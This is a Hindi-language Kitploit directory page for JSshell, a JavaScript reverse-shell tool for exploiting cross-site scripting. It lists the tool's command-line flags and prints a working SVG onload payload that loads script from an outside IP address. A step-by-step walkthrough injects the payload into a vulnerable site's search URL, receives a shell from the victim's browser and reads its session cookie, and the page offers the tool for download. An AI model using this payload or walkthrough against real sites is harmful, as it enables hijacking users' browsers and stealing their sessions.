Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
JSshell — JSshell - JavaScript रिवर्स/रिमोट शेल | Kitploit
उपकरण/GitHubGitHub/shelld3v/jsshell
पेलोड जनरेशनवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubshelld3v/jsshell

JSshell

JSshell - JavaScript रिवर्स/रिमोट शेल

रिपॉजिटरी देखें
6311103 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

JSshell - संस्करण 3.1

JSshell

JSshell - एक JavaScript रिवर्स शेल। इसका उपयोग दूरस्थ रूप से JS कोड निष्पादित करने, ब्लाइंड XSS का शोषण करने, ... के लिए किया जाता है।

आवश्यकताएँ: कोई भी OS + Python 2 या Python 3

JSshell संस्करण 3.1 में नया

JShell 3.1 के नए संस्करण में अद्यतन:

  • नया JSshell कमांड: snippet -> जावास्क्रिप्ट कोड का एक स्निपेट लिखने की अनुमति देता है
root@kitploit:~
>>> snippet
Use CTRL+D to finish the snippet

function new() {
    new = 'New update: Support javascript snippet =)';
    confirm(new)
}

new()
>>> 
  • शांत मोड (पेशेवरों के लिए)
  • <body> रिवर्स शेल पेलोड जोड़ा गया
  • कुछ बग्स ठीक किए गए

उपयोग

JS रिवर्स शेल पेलोड जनरेट करें: -g

सुनने और पेलोड जनरेट करने के लिए स्थानीय पोर्ट नंबर सेट करें (डिफ़ॉल्ट: 4848): -p

पेलोड जनरेट करने के लिए स्थानीय स्रोत पता सेट करें (डिफ़ॉल्ट: आपका IP पता स्वतः पता लगाएं): -s

शेल कनेक्शन के लिए टाइमआउट सेट करें (यदि उपयोगकर्ता सत्र से बाहर निकलता है, तो शेल हमेशा के लिए रुक जाएगा, इसलिए यदि आप टाइमआउट सेट करते हैं, तो शेल टाइमआउट पार करने के बाद बंद हो जाएगा): -w

शेल प्राप्त करने के बाद एक कमांड निष्पादित करें: -c

उपयोग के उदाहरण:

  • jsh.py
  • jsh.py -g
  • jsh.py -p 1234
  • jsh.py -s 48.586.1.23 -g
  • jsh.py -c "alert(document.cookie)" -w 10

JSshell चलाने का एक उदाहरण:

यह JSshell का उपयोग करने के तरीके का एक चरण-दर-चरण उदाहरण है।

पहले, हमें एक रिवर्स JS शेल पेलोड जनरेट करना होगा और शेल टाइमआउट सेट करना होगा (जैसे 20 सेकंड):

root@kitploit:~
~# whoami
root
~# ls
README.md   jsh.py
~# python3 jsh.py -g -w 20
    __
  |(_  _ |_  _  |  |
\_|__)_> | |(/_ |  |
                      v1.0

Payload:
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>

Listening on [any] 4848 for incoming JS shell ...

अब इस पेलोड को वेबसाइट पर पेस्ट करें:

https://vulnwebs1te.com/b/search?q=<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},1248)>

पेज तक पहुँचें और हमारे पास रिवर्स JS शेल होगा:

root@kitploit:~
    __
  |(_  _ |_  _  |  |
\_|__)_> | |(/_ |  |
                      v1.0

Payload:
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>

Listening on [any] 4848 for incoming JS shell ...
Got JS shell from [75.433.24.128] port 39154 to DESKTOP-1GSL2O2 4848
$ established
$ the
$ shell
$
$
$ help
JSshell using javascript code as shell commands. Also supports some commands:
help                  This help
exit, quit            Exit the JS shell
$

कुछ कमांड निष्पादित करें:

root@kitploit:~
$ var test = 'controlled'
$ confirm(test)
$

और एक अलर्ट पॉप अप होगा: controlled

root@kitploit:~
$ prompt(document.cookie)
$

और ब्राउज़र उपयोगकर्ता कुकीज़ प्रिंट करेगा: JSESSION=3bda8...

root@kitploit:~
$ exit
~# whoami
root
~# pwd
/home/shelld3v
~#

अब बाहर निकल गए!

लेखक

इसे shelld3v द्वारा बनाया गया है!

टूल डाउनलोड करें